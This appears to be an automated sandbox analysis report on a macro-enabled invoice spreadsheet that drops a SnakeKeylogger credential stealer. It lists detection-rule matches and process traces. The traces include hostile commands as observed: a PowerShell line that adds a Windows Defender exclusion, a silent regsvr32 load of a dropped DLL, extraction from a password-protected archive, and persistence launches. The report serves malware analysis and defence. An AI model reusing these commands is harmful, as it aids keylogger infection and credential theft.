Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: String function: 00007FFD0F00C460 appears 3390 times
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: String function: 00007FFD0EED5750 appears 314 times
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: String function: 00007FFD0EED5330 appears 436 times
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: String function: 00007FFD10205750 appears 210 times
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: String function: 00007FFD1019EC60 appears 68 times
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: String function: 00007FFD102052E0 appears 212 times
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: String function: 00007FFD1033C460 appears 3390 times
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: String function: 00007FFD10205330 appears 326 times
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: String function: 00007FFD103F69F0 appears 3390 times
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: String function: 00007FFD103F7BC0 appears 58 times

Source: PO202502SNAKWS.exe.6.dr	Static PE information: Number of sections : 11 > 10
Source: PO202502SNAKWS.exe.3.dr	Static PE information: Number of sections : 11 > 10

Source: 24.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 22.2.PO202502SNAKWS.exe.1b37f45caa0.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 22.2.PO202502SNAKWS.exe.1b37f45caa0.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 22.2.PO202502SNAKWS.exe.1b37f45caa0.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 27.2.PO202502SNAKWS.exe.15f2a45caa0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 27.2.PO202502SNAKWS.exe.15f2a45caa0.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 27.2.PO202502SNAKWS.exe.15f2a45caa0.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 27.2.PO202502SNAKWS.exe.15f2a45caa0.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 27.2.PO202502SNAKWS.exe.15f2a45caa0.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 27.2.PO202502SNAKWS.exe.15f2a45caa0.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 6.2.PO202502SNAKWS.exe.2763805caa0.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 6.2.PO202502SNAKWS.exe.2763805caa0.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 22.2.PO202502SNAKWS.exe.1b37f45caa0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 22.2.PO202502SNAKWS.exe.1b37f45caa0.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 22.2.PO202502SNAKWS.exe.1b37f45caa0.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 6.2.PO202502SNAKWS.exe.2763805caa0.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 6.2.PO202502SNAKWS.exe.2763805caa0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 6.2.PO202502SNAKWS.exe.2763805caa0.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.2.PO202502SNAKWS.exe.2763805caa0.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0000001B.00000002.1378826053.0000015F2A400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000016.00000002.1302880472.000001B37F400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000006.00000002.1199461770.000002B6CE800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000001B.00000002.1379298325.0000019FBF400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000006.00000002.1198814706.0000027638000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000016.00000002.1303236859.000001F414400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: PO202502SNAKWS.exe PID: 7008, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: PO202502SNAKWS.exe PID: 7952, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: PO202502SNAKWS.exe PID: 6056, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: C:\Users\user\SystemRootDoc\nasrallah_x86.dll, type: DROPPED	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\nasrallah_x86.dll, type: DROPPED	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: 6.2.PO202502SNAKWS.exe.2763805caa0.0.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 6.2.PO202502SNAKWS.exe.2763805caa0.0.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 6.2.PO202502SNAKWS.exe.2763805caa0.0.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 22.2.PO202502SNAKWS.exe.1b37f45caa0.0.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 22.2.PO202502SNAKWS.exe.1b37f45caa0.0.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 22.2.PO202502SNAKWS.exe.1b37f45caa0.0.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 27.2.PO202502SNAKWS.exe.15f2a45caa0.0.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 27.2.PO202502SNAKWS.exe.15f2a45caa0.0.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 27.2.PO202502SNAKWS.exe.15f2a45caa0.0.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winXLSM@32/22@6/7

Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe

Code function: 6_2_00007FFD100E77E0 SetLastError,FormatMessageW,GetLastError,SetLastError,FormatMessageW,GetLastError,

6_2_00007FFD100E77E0

Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 6_2_00007FFD100E9420 SetLastError,AdjustTokenPrivileges,GetLastError,		6_2_00007FFD100E9420
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 22_2_00007FFD0EDB9420 SetLastError,AdjustTokenPrivileges,GetLastError,		22_2_00007FFD0EDB9420

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xml

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

File created: C:\Users\user\Desktop\~$PO202503S.xlsm

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7264:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7964:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6368:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5068:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8152:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7060:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7844:120:WilError_03

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\{37D10FEF-523F-45D2-9D6C-4DD85F36E551} - OProcSessId.dat

Jump to behavior

Source: PO202503S.xlsm

OLE indicator, Workbook stream: true

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\7-Zip\7z.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: PO202503S.xlsm

Virustotal: Detection: 16%

Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process created: C:\Program Files\7-Zip\7z.exe "C:\Program Files\7-Zip\7z.exe" x -p123456 -y -o"C:\Users\user\AppData\Local\Temp\invoice_temp\" "C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.zip"
Source: C:\Program Files\7-Zip\7z.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\regsvr32.exe "regsvr32.exe" /s "C:\Users\user\AppData\Local\Temp\invoice_temp\vcruntime210.dll"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process created: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe "C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe"
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\SystemRootDoc' -Force"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /C start "" /D "C:\Users\user\SystemRootDoc" "C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe "C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe"
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: unknown	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /C start "" /D "C:\Users\user\SystemRootDoc" "C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe "C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe"
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process created: C:\Program Files\7-Zip\7z.exe "C:\Program Files\7-Zip\7z.exe" x -p123456 -y -o"C:\Users\user\AppData\Local\Temp\invoice_temp\" "C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.zip"	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\regsvr32.exe "regsvr32.exe" /s "C:\Users\user\AppData\Local\Temp\invoice_temp\vcruntime210.dll"	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process created: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe "C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\SystemRootDoc' -Force"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe "C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe"
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe "C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe"
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"

Source: C:\Program Files\7-Zip\7z.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Section loaded: libcares-2.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Section loaded: icu.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Section loaded: msvcp290.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
